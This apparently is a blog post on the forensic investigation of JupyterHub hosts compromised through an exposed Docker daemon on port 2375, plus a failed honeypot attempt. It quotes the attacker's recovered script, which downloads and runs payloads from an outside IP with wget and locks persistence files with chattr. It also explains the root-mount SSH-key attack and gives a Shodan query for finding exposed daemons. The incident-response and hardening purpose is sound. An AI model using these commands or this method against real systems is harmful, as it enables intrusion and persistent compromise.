Docker Security Woes

By Jordan Rodgers

 

The other month at work, we found a few systems that were compromised. The systems were a part of a JupyterHub setup and were hosting Jupyter notebooks within Docker containers. JupyterHub uses the Docker daemon with Swarm to spin up new containers (an example guide for how it was set up can be found here: https://zonca.github.io/2016/05/jupyterhub-docker-swarm.html). Thus, it is required that the Docker daemon be listening on a port on all of the nodes for the master to send Docker commands to. That, in conjunction with a few other misconfigurations, led to all of the nodes being compromised.

The Initial Plan

I figured I could try to replicate the misconfiguration that caused them to be compromised on a few systems to create a simple honeypot, allowing me to see how else the systems would be compromised and what the compromised systems would be used for. I started out with 2 VMs running CentOS 7 and Ubuntu 16.04.2. First thing I did was disable SELinux and AppArmor. Next, I configured the Docker daemon to listen on the default port (2375).

To setup the Docker daemon on CentOS to listen on port 2375, I had to add the following to the end of OPTIONS in /etc/sysconfig/docker:

-H unix:///var/run/docker.sock -H tcp://0.0.0.0:2375

To setup the Docker daemon on Ubuntu to listen on port 2375, I had to remove the following from the ExecStart section of /etc/systemd/system/multi-user.target.wants/docker.service:

-H fd://

Also, I had to add the following to /etc/docker/daemon.json:

{

“hosts”: [“fd://”, “tcp://0.0.0.0:2375”]

}

I disabled the firewall on both systems and checked to make sure I could remotely manage the docker daemon on both of them. And then I waited…

What Went Wrong

In my draft for this blog post, I had “Within X time they had already been compromised!” ready to go, assuming it would take hardly any time at all for the systems to be compromised. To my surprise, neither of them were ever compromised over the course of the 3 weeks I had them open to the world.

I’m not quite sure why they weren’t compromised. One idea I have is that the version of Docker I used was the one available in the distribution repositories, which is outdated. If scanners in the wild were attempting to use the Docker Python client to interact with them, they wouldn’t be able to. Many functions can’t be manipulated with the Docker Python client if the server is running any version of Docker older than 1.15. Mine were running 1.12.6.

Unfortunately, my attempt at getting my misconfigured Docker systems to be compromised was a failure. So I figured I would take this time to go over the discovery and forensics process of the compromised systems from my work.

Discovery/Forensics of the Compromised Systems

A few months ago, one of my co-workers got into work and was looking at his JupyterHub setup. He went in to update Docker on one of the nodes and observed a strange error. Looking online, he was able to find a page that said all he had to do was delete a file “/etc/init.d/DbSecuritySpt” in order to fix it. Curious, he looked online for more information about the file and ran across this page: http://blogg.openend.se/2014/3/2/malware-under-linux.

It essentially goes over how someone discovered their system had been compromised and was being used as a part of a DDoS. At this point, he told me about what he found on the system and we started investigating if and how the systems were compromised.

The first thing we looked at was the “/etc/init.d/DbSecuritySpt” file. All it was, was a script that executed “/root/pak”, a binary. When we looked in the bash history, the following lines of interest were found:

34  chattr -i /usr/bin/wget

35  chmod u+x /usr/bin/wget

36  wget 43.230.145.166:566/a

37  chmod u+x a

38  ./a

39  exit

It looks like the attacker changed some attributes on wget, pulled down a file named “a”, and then executed it.

Here were the contents of the “a” file:

chattr + .bash_history
wget -P /etc/ 43.230.145.166:566/iptabt
chmod u+x  /etc/iptabt
chattr +i  /etc/iptabt
/etc/iptabt

wget 43.230.145.166:566/2017
chmod u+x 2017
./2017

chattr +i /root/.ssh/authorized_keys
chattr +i /etc/crontab
chattr +i /mnt
chattr +i /etc/cron.hourly

rm -rf a

iptables -I INPUT -s 192.168.0.0/16 -p tcp –dport 2375 -j ACCEPT
iptables -I INPUT -s 172.0.0.0/8 -p tcp –dport 2375 -j ACCEPT
iptables -I INPUT -s 10.0.0.0/8 -p tcp –dport 2375 -j ACCEPT
iptables -I INPUT -s 121.12.119.0/24 -p tcp –dport 2375 -j ACCEPT
iptables -I INPUT -s 111.74.0.0/16 -j DROP
iptables -I INPUT -s 64.34.0.0/16 -j DROP
iptables -I INPUT -s 183.131.0.0/16 -j DROP
sudo apt-get update

sudo apt-get install iptables-persistent

There is some fun stuff in that script. I’m not really going to focus on what the attacker did with the system, but rather how they actually got in. So how did someone manage to execute the commands as root that we saw in the bash history? I figured the next step would be to examine the authentication logs to see if there were any logins from strange IP addresses:

1

Sure enough, there was a successful root login. The interesting part was that it was a login using an SSH key… How did someone manage to get their SSH key on the system? Checking out the authorized_keys file, there was in fact a key there that didn’t belong to any of us:

2

Weird… I figured I would check when the file was last modified:

3

Sure enough, the modify time was about 7 seconds before the root login. Things were starting to make a little more sense, but how did the SSH key get there?

We poked around a few more areas for a little while before finally looking at Docker. A quick container list yielded some promising results:

4

Those were containers my co-worker didn’t recognize! Using the Docker logs, we attempted to check what those containers actually did when they ran:

5

The first unrecognized one was trying to do something with crontab, but it doesn’t look like it succeeded… Then we checked the next one:

6

Bingo! Someone launched a container and added the key to… a directory under /mnt? What was mounted there?

Using the Docker inspect command, we could find out all sorts of cool details about the container, including this one:

7

They literally mounted the root of the filesystem in the container… The authorized_keys file that the container added an SSH key to was actually the authorized_keys file of the root user on the host system. Neat.

Just to confirm, I checked the time that the container was created:

x6

Sure enough, it was 9 seconds before the authorized_keys file was modified and 16 seconds before the root login occurred.

So far, we know that the attacker launched a container, mounted the root of the filesystem under /mnt, and wrote an SSH key to the authorized_keys file of the root user. Then, they logged in using the SSH key, ran a command that pulled down their malicious script, and then got off the system (at least off of SSH).

The final question: how did they create the container? After searching around for quite some time and talking with my co-worker about how he had set everything up, I finally came across a configuration in Docker that threw a warning sign:

8

(IP addresses have been redacted)

The -H option for the Docker daemon tells it to listen on a specific socket or port. Usually, it is set to the Docker socket on the local host, as you might have seen near the beginning of this post:

-H unix:///var/run/docker.sock

So why was Docker configured on this system to listen on an actual network interface? My co-worker explained to me that that was how JupyterHub managed Docker to deploy the necessary containers. A quick look at iptables showed that there were no rules at all, not even an implicit deny. The entire world could connect to this system’s Docker daemon and do anything. My co-worker did mention that there were firewall rules, but he manually applied them every time he restarted the system… We were having some issues in the past with our VM infrastructure, so it is likely this specific VM rebooted without his knowledge. AppArmor or SELinux should have prevented Docker from mounting the root of the filesystem and manipulating the root user’s authorized_keys file, but unfortunately neither of those systems were configured either.

So that was it. A firewall misconfiguration, insecure Docker configuration, and no proper mandatory access control system led to the entire box being compromised. I haven’t had a chance to take a closer look at the binaries that were placed on the system, but I plan to in the future.

How Common Is This?

When I was poking around on Shodan (https://www.shodan.io/), I did find all of the systems that had been compromised and they all showed as having the Docker daemon port (2375) open. After a bit of trial and error, I was able to find a Shodan search query for open Docker daemons:

port:2375 HTTP/1.1 404 Not Found Content-Type: application/json

As of the writing of this, there were 327 results:

9

The very first result I tried did in fact have an open Docker daemon:

10

It amazed me just how many other systems had this problem. Someone had to intentionally configure Docker to listen on a network interface for this to be a problem.

A Tool to Help

I looked around and didn’t find many tools available that would check and/or exploit a system with this specific misconfiguration, so I figured I would go ahead and write one:

https://github.com/com6056/docker-daemon-checker

Currently, it assumes the target system has SELinux installed on it. It will check if the daemon port is open, check the SELinux status on the host through a container, and optionally exploit the host by adding an SSH key of the user’s choosing to root’s authorized_keys.

 

Here is the output from it running against the CentOS 7 system that I set up as part of the honeypot:

11

As soon as my script finished, I could login using my SSH key to the root account on the system:

12

In the future, I plan to add support for systems that have AppArmor as well as systems that don’t have any sort of mandatory access control system. I also want to add the ability to scan and/or exploit multiple systems at a time.

Conclusion

In conclusion, Docker is an amazing piece of technology that has revolutionized how we deploy modern applications. It is also a dark and scary technology that has the ability to ruin your day. Be careful with it. Ensure you don’t have the Docker daemon listening on an actual network interface (which it shouldn’t by default). Use SELinux or AppArmor if you can, as it can really save the day if you do happen to misconfigure something. Last but not least, firewalls are your friend and should definitely be checked for misconfigurations periodically.

 

Happy containerizing!

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s